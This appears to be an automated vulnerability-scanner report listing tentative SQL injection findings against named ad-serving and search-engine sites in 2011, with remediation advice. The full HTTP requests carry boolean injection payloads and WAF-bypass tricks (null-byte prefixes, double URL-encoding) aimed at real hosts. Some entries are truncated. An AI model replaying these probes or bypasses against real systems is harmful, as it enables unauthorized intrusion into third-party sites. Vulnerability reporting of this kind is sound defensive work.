The DORK Report, XSS, SQL Injection, HTTP Header Injection

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [PG parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The PG parameter appears to be vulnerable to SQL injection attacks. The payloads 66872473'%20or%201%3d1--%20 and 66872473'%20or%201%3d2--%20 were each submitted in the PG parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ66872473'%20or%201%3d1--%20&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response 1

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 05 Feb 2011 14:21:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Tue, 08-Mar-2011 14:21:37 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:38885:1296915697:L|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Mon, 07-Mar-2011 14:21:37 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 856

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ66872473'%20or%201%3d1--%20&ASI
...[SNIP]...
<img style="border:none;" src="http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/7_texture_120x30-120x30NL.gif" alt="Online $7 Trades! Click to find out more!" /></a>');
       document.close();
   }

   wsod_image();

Request 2

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ66872473'%20or%201%3d2--%20&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response 2

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 05 Feb 2011 14:21:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Tue, 08-Mar-2011 14:21:38 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:38885:1296915698:L|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Mon, 07-Mar-2011 14:21:38 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 845

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ66872473'%20or%201%3d2--%20&ASI
...[SNIP]...
<img style="border:none;" src="http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/120x30 Static.gif" alt="Online $7 Trades! Click to find out more!" /></a>');
       document.close();
   }

   wsod_image();

1.2. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [i_34 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The i_34 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the i_34 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2'%20and%201%3d1--%20; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response 1

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 05 Feb 2011 14:22:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Tue, 08-Mar-2011 14:22:57 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:38885:1296915777:L|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Mon, 07-Mar-2011 14:22:57 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 829

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a4
...[SNIP]...
<img style="border:none;" src="http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/7_texture_120x30-120x30NL.gif" alt="Online $7 Trades! Click to find out more!" /></a>');
       document.close();
   }

   wsod_image();

Request 2

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2'%20and%201%3d2--%20; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response 2

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 05 Feb 2011 14:22:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Tue, 08-Mar-2011 14:22:58 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:38885:1296915778:L|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Mon, 07-Mar-2011 14:22:58 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 818

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a4
...[SNIP]...
<img style="border:none;" src="http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/120x30 Static.gif" alt="Online $7 Trades! Click to find out more!" /></a>');
       document.close();
   }

   wsod_image();

1.3. http://blekko.com/ws/+/adsense=9396229490951644 [suggestedSlashtagsList cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://blekko.com
Path:	/ws/+/adsense=9396229490951644

Issue detail

The suggestedSlashtagsList cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the suggestedSlashtagsList cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ws/+/adsense=9396229490951644 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1%00'; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:38:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:38:35 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 69227
X-Blekko-QF: hq
X-Blekko-PT: 043e4df497bc60c2f9d74ccf2865876e

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
form CSRF attacks against FTP services, in this case Sun Solaris 10 ftpd. An attacker could embed a payload such as the following to execute commands on ftpd. The NetBSD team addressed this issue by failing on large commands.</p>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:35 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

1.4. http://blekko.com/ws/+/ip=207.97.227.239 [sessionid cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://blekko.com
Path:	/ws/+/ip=207.97.227.239

Issue detail

The sessionid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sessionid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the sessionid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /ws/+/ip=207.97.227.239 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924%2527; fbl=2;

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:38:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:38:49 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 67781
X-Blekko-QF: hq
X-Blekko-PT: c6c42f446173c6636976da330a49adfe

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<p class="desc" id="snippet9">Generating SSH keys. Attempting to redirect to the guide for your OS. If the redirect fails, pick your OS. How to install git. How to generate SSH keys and add them to GitHub.</p>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:49 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

1.5. http://blekko.com/ws/+/press-videos [fbl cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://blekko.com
Path:	/ws/+/press-videos

Issue detail

The fbl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fbl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the fbl cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2%2527;

Response 1

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:27 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:27 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:27 GMT
Content-Length: 24116
X-Blekko-PT: 9e2a197eec3851ae4e785b4d3d881d57

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.6. http://blekko.com/ws/+/press-videos [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://blekko.com
Path:	/ws/+/press-videos

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /ws/+/press-videos?1%00'=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:31 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

Request 2

GET /ws/+/press-videos?1%00''=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:31 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:31 GMT
Content-Length: 24146
X-Blekko-PT: 311769e7f41b71315993b41ac3f8ce2d

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.7. http://blekko.com/ws/+/press-videos [sessionid cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://blekko.com
Path:	/ws/+/press-videos

Issue detail

The sessionid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sessionid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

Response 1

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:26 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:26 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:26 GMT
Content-Length: 24116
X-Blekko-PT: b99ae2b84b5ff48883c9d27b96b0889c

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.8. http://blekko.com/ws/+/press-videos [suggestedSlashtagsList cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://blekko.com
Path:	/ws/+/press-videos

Issue detail

The suggestedSlashtagsList cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the suggestedSlashtagsList cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the suggestedSlashtagsList cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

Response 1

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:25 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:25 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:25 GMT
Content-Length: 24137
X-Blekko-PT: 355cde925bffe3e60c7fb364a14fdbc7

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.9. http://blekko.com/ws/+/press-videos [t cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://blekko.com
Path:	/ws/+/press-videos

Issue detail

The t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621'; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:24 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

Request 2

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621''; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:24 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:24 GMT
Content-Length: 24116
X-Blekko-PT: 5dce9899c2a36d366147f2bbf44adfd0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.10. http://blekko.com/ws/+/press-videos [v cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://blekko.com
Path:	/ws/+/press-videos

Issue detail

The v cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the v cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the v cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3%2527; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:23 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

Request 2

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3%2527%2527; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:23 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:23 GMT
Content-Length: 24116
X-Blekko-PT: 26e1271c4a4322cb094bd1db889aad52

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.11. http://blekko.com/ws/+/privacy [suggestedSlashtagsList cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://blekko.com
Path:	/ws/+/privacy

Issue detail

Remediation detail

Request 1

GET /ws/+/privacy HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
